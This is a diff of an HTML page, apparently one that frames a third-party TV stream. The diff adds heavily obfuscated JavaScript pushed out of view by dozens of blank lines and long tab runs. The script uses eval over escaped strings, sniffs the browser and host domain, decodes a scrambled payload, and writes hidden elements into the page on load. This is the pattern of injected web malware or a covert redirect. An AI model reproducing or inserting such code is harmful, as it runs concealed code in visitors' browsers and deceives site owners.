--- a/AAmobileTV-98.html
+++ b/AAmobileTV-98.html
@@ -1,19 +1,128 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 FRAMESET//EN">
-<HTML>
-<HEAD>
-<TITLE>AA-MOBILE-TV STREAMS</TITLE>
-</HEAD>
-<FRAMESET ROWS="100%">
-  <FRAME SRC="https://daddyhd.com/embed/stream-98.php">
-  <NOFRAMES>
-    <HEAD>
-    <TITLE>AA-MOBILE-TV STREAMS</TITLE>
-    <META HTTP-EQUIV="REFRESH" CONTENT="0; URL='https://daddyhd.com/embed/stream-98.php'">
-    </HEAD>
-    <BODY>
-    <P>Your browser does not seem to support frames or frame support has been disabled.</P>
-    <P>Please <A HREF="https://daddyhd.com/embed/stream-98.php">click here</A> to proceed to the site.</P>
-    </BODY>
-  </NOFRAMES>
-</FRAMESET>
-</HTML>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+																																							<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 FRAMESET//EN"><HTML><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var c6ca8b5=true;ll1=document.layers;lll=window.sidebar;c6ca8b5=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');c6ca8b5|=lII;zLP=location.protocol+'0FD';eval(unescape('v\141%72%20qy%37%3D%27%27%3Bqy%38%3D%53%74r\151\156\147%2E\146romC\150a%72C\157d\145%28%31%33%2C%31%30%29%3B\146\157r%28\151%3D%30%3B\151%3C%32%35%30%31%3Bi%2B%2B%29%7Bq%79%37%2B%3Dq\171%38%7D%3B\146un%63\164i%6F\156%20%71\171%36%28%29%7Bif%28%21\144o\143ume\156t%2E%64\157%63\165m\145\156%74M\157d\145%26%26%21d%6Fcu\155e%6E\164%2E%61l\154%29%7Bd%6F\143ument%2Ew%72%69\164%65%28\161y%37%29%7D%7D%3B\161y%36%28%29%3B\146%75nct%69\157\156%20\161%79%39%28%29%7B\172i%39%3D%22%3Cs%22%2B%22%70an%20%73t\171%6C%65%3D%27%64is\160%6C%61%79%3Anone%27%3E%3Cpre%3E%22%2Bq\171%37%2B%22%3C%2F%70%72e%3E%3C%2F\163%22%2B%22%70\141\156%3E%22%3Bz%69%32%3D%6E%65%77%20A\162ra\171%28%27a\146t%65\162\102egi\156%27%2C%27bef%6F\162eE%6E\144%27%2C%27\141\146\164%65\162\105n\144%27%2C%27%62ef\157reB\145gi%6E%27%29%3B%7A\151%33%3D\156%65\167%20\101rr%61\171%28%27\150t\155\154%27%2C%27he\141d%27%2C%27b%6Fd%79%27%29%3Bfo%72%28\153%3D%30%3Bk%3C%3D%7Ai%33%2Ele%6E%67%74%68%3Bk%2B%2B%29%7B\172i%34%3Ddo\143\165\155ent%2Eg\145tEl%65men%74\163%42%79%54\141g\116\141%6De%28%7A\151%33%5Bk%5D%29%3Bf\157\162%28%6A%3D%30%3B\152%3C%3Dz%69%34%2E%6Ce%6E\147%74\150%3B%6A%2B%2B%29%7Bfor%28\151%3D%30%3Bi%3C%3D%33%3B%69%2B%2B%29%7Bi\146%28z%69%34%5B\152%5D%29%7B%7Ai%34%5B\152%5D%2E%69nse%72t\101\144\152a%63\145n\164\110T\115L%28\172\151%32%5B%69%5D%2C%7Ai%39%29%7D%7D%7D%7D%7D%3B'))</script><script>se='vrke=sd\'dcmn.rt(<+syemdapitbd{ipa:oe<+/tl>)d=ouetlyr;ewno.pr?:;a(ouetdcmnMd|dcmn.l)&o;edcmn.eEeetydw=idwsdbrtu:as;NnvgtrueAettLwrae)iNt.neO(ntcp\'>0tu:as;i=azs=avrmg\';ucinnm)rtr re;idwoerr=nmzFwno.oainpooo.neO(fl\'!-?refleifzs&zFtu:as;a l=as;m=ouetlcto.rfdndntLwrae)dndnsbt(m.neO(/\'+)dndnsbtig0dnidxf\'\')aenwAry\'ooiigtu.o,wwamblt.k,amblt.k,wwamblt.a,amblt.a,ambvgtu.o,22a22.ihbi\'\'w.aoievc\'\'aoievc\'\'w.aoievm\'\'aoievm\'\'aot29.ihbi\'\'aoievceueboso.o\'\'w.aoiev.l,wwamblt1g\'\'w.aoiev.f,wwamblt1t\'\'aoiev1.lgptcm,ambltshdl.lgptcm,amblt22-00boso.o\';o(=;<w.eghm+{fdnidxfaem)-)qptu;ra};f!l)ti.oainhe=aotbak}s=<RMSTRW=10"<RM R=hts/ddydcmebdsra-8pp>/RMST<citi=l1`vrpcn=;a y=`q8Srn.rmhroe1,01,0;o(=;<9;+)q7=y}l1=<+!-+y+-"""II=/+*+y+*+/;I1"sr+it"lI()lI()"`+I13+`/ci+p>;l1"s+pnsye`ipa:oe>pe"q7"/r>/""a>;llI1+11I1;11"""pn"lI=<""pn"lI=<+sa tl=vsblt:idn>wadx"lI;ucinlI({l1nwAry`eoeei``feBgn,bfrEd,atrn`;lInwAry`tl,ha``oy,a,ig,dv,fr``al``cit,ipt,p)l1=1l)sic(I1{ae1l1=e ra(97,97,37,37,37,3;ra;ae2l1=e ra(84,71,11,,,21,5;ra;ae3l1=e ra(,83,591,,,21,5;ra;ae4l1=e ra(84,71,11,,,21,5;ra;eal:IlnwAry00000000000}II=e ra(11II,I1I1,llIl,1llI)ll(ouetgtlmnsyaNm(lI2)0,,II7)frt0tI1.eght+{=Ilt;1ldcmn.eEeetBTgaeI1[];tLI1.eghfrj0jca;+)frx0x4x+{fmMt.o(,){l1I1[]xII[>>]}};1I)l1(;lI)I1(;eTmot`ll),00}fnto 1I)vrll=ouetiae,lIdcmn.ik,lll.eghl=lIlnt,1Iwiei)Il=ouetcetEeet`pn)I1=ll-i]i((pof2)tyIl.pedhl(1IprnNd.elcCidIl,1I)cthe{};hl(l{1ldcmn.raelmn(sa`;1IIl[-l;f!pcn&){r{1lapnCidI1.aetoerpaehl(1lI1)}ac()}};ucinl1({idwoe=uldcmn.pnnl;ouetwienl;idwaetnl;;ucinll({a xrFn1nn=}fnto 11)vretaucCtt0;ucinll(,,)tyi(wno.iea)eisrAjcnHM(l1p,)es rfdcmn.raeag(.raeotxulrgetc;fp=)eprnNd.neteoerfe}i(=1{.neteoerfefrthl);fp=)eapnCidrf}i(=3{.aetoeisrBfr(c,.etiln)}cthxu{}fnto I1j{=ahrno(;=e ae)gtie)i(=1{=tigfoCaCd(ahforr2+5)es oMt.lo(**00+`o=;+oo=}i(=3{+oo=}rtr }i(yefwno.dEetitnr=udfnd)wno.dEetitnr`od,Ilfle}lei(yefdcmn.dEetitnr=udfnd)dcmn.dEetitnr`od,Ilfle}lei(yefwno.tahvn!`neie`{idwatcEet`nod,Il}fnto 1l)l1=;=aiao.srgn.ooeCs(;fwno.iea)l1=}i(idwcrm)l1=}i(idwoea{I14;fdcmn.l&l1!=)l1=}i(.neO(sfr`>)l1=}i(l1=1&(.neO(i 0)1)l1=0;eunl1}/cit srp>ucinIl({r{11dcmn.eEeetyd`1I)lI.aetoermvCidlI)cther)}<srp>;a we\'se;ouetwie\'\'\'tl ei=rn>oydslynn}\'\'sye\';ldcmn.aeso=idwoea10d=dcmn.ouetoe|ouetal&!eg=ouetgtlmnBI;swno.iea?reflet=aiao.srgn.ooeCs(;z=Nidxf\'esae)=?reflezsd;i8d;a s=\'fnto e({euntu}wno.nro  e;O=idwlcto.rtclidxf\'ie)=1tu:as;7=i&!O?reflevrqpfledndcmn.oainhe;m=m.ooeCs(;m=m.usrdnidxf\'/)2;m=m.usrn(,m.neO(/);w=e ra(ddny.ihbi\'\'w.aoievt\'\'aoievt\'\'w.aoievg\'\'aoievg\'\'aot.ihbi\'\'02a02gtu.o,wwamblt.f,amblt.f,wwamblt.l,amblt.l,ambv00gtu.o,ambltshdl.lgptcm,wwamblt1m\'\'w.aoiev.a,wwamblt1c\'\'w.aoiev.k,amblt12boso.o\'\'aoievceueboso.o\'\'aoiev0225.lgptcm)frm0maelnt;+)i(m.neO(w[]>1{l=rebek}i(qp{hslcto.rf\'bu:ln\';0\'FAEE OS"0%>FAESC"tp:/adh.o/me/tem9.h"<FAEE>srp d`1I>a pof0vrq7`;y=tigfoCaCd(31,31)fri0i43i+{y+q8;11"""-"q7"-+>;Il""""q7""""II=<c""p>+I11+I12+="lI()"<sr""t"I1=<""a tl=dslynn`<r>+y+<pe<s+pn"I1=l1l1+l1Il=<+sa>;1l"/+sa>;1I"""pnsye`iiiiyhde`qeszc+1lfnto Il)Il=e ra(bfrBgn,atrei``eoen``feEd)I1=e ra(hm``ed,bd````m``i``om,tbe,srp``nu```;I1l1(;wthl1)cs :IlnwAry7,97,37,37,37,37)bekcs :IlnwAry3,74,54,5992,51)bekcs :IlnwAry03,81,,5992,51)bekcs :IlnwAry3,74,54,5992,51)bekdfutl1=e ra(,,,,,,,,,,);IInwAryl1,IlII,l1I1,11lI,1I;l1dcmn.eEeetBTgaeI1[][]2II[];o(=;<lIlnt;+)ml1[]I1=ouetgtlmnsyaNm(lIt)ca=1llnt;o(=;<tLj+{o(=;<;+)i(&ahpw2x)ll(1lj,,IIm>4)}}Il(;II)ll(;11)stieu(Il(`10);ucinIl({a lldcmn.mgsIl=ouetlnsi=lllnt,lIl.eghI1;hl(l{1ldcmn.raelmn(sa`;1Ill[-l;f!pcn&){r{1lapnCidI1.aetoerpaehl(1lI1)}ac()}}wiel)Il=ouetcetEeet`pn)I1=lI-l]i((pof1)tyIl.pedhl(1IprnNd.elcCidIl,1I)cthe{}}fnto II)wno.pnnl;ouetoe=uldcmn.rt=ulwno.lr=ul}fnto lI)vretaucCtt0;ucinI1({a xrFn2nn=}fnto l1epc{r{f!idwsdbr{.netdaetTLIl[]c}le{c=ouetcetRne)cetCnetaFamn()i(=0{.aetoeisrBfr(c,);fp=)eisrBfr(c,.isCid}i(=2{.pedhl(c);fp=)eprnNd.neteoerfenxSbig}}ac(u)};ucinlI()rMt.adm)dnwDt(.eTm(;fj=)oSrn.rmhroeMt.lo(*56)}le{=ahforrd10)`;+oo=;+o;fj=)o=;+o;euno;ftpo idwadvnLsee!`neie`{idwadvnLsee(la`lI,as)es ftpo ouetadvnLsee!`neie`{ouetadvnLsee(la`lI,as)es ftpo idwatcEet=udfnd)wno.tahvn(ola`lI);ucinl1({I10unvgtrueAettLwrae)i(idwsdbr{I12;fwno.hoe{I13;fwno.pr)l1=}i(ouetal&I1=4{I11;fuidxf`aai)1{I13;f(I1=)&uidxf`e1`>){I11}rtr I1<srp><citfnto ll)tylI=ouetgtlmnBI(l1`;11prnNd.eoehl(11}ac(rr{}/cit\'';function ___(____){return unescape(____)};iylg571='aLdSsQ1lxlOOQvOOytYGOfsmOOZo0Ol1duOXLTBbPdSsQ1lxKbJZSOjLvGOsdSsQ1lxJbZEbBo0Ol1';eval(___('k%3D\165%6Ee\163c%61%70%65%28%27%25%30D%25%30A%27%29%3B%66unc%74ion%20u%6Ed%31%28\163%29%7B%76a\162%20\165\156%3D%27%27%3B%6C%3D%73%2E\154e\156%67%74\150%3Bo\150%3D%4D%61\164h%2Er%6F%75nd%28\154%2F%32%29%3B\146%6Fr%28%69%3D%30%3Bi%3C%3Do%68%3Bi%2B%2B%29%7B%61%3D\163%2Ec%68a%72\101\164%28i%29%3B%62%3D%73%2E%63\150a\162\101t%28\151%2B%6F%68%29%3Bc%3Da%2B\142%3B%75n%3Du%6E%2Bc%3B%7D%3B\117%3D%75\156%2E\163%75%62s%74%72%28%30%2Cl%29%3B%7D%3Bun%64%31%28se%29%3B%65%76%61%6C%28\117%29%3Bf%75nc\164i%6Fn%20\165%6E\144%32%28x%29%7B%78%3D\170%2Erep\154a%63\145%28%2F%60%2Fg%2C%22%27%22%29%3Bx%3Dx%2E%72\145p\154\141%63e%28%2F%40%40%2F\147%2C%27%5C%5C%27%29%3Bf%20%3D%20%2F%71\147%2F\147%3B\170%3D%78%2Ere%70\154\141\143e%28f%2Ck%29%3B\144\157c\165\155ent%2Ew\162i\164%65%28x%29%7D%3B'));if(zis8){window.attachEvent('onload',qy9)};</script><TITLE>AA-MOBILE-TV STREAMS</TITLE></HEAD><script>und2(s0)</script></HTML> 
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
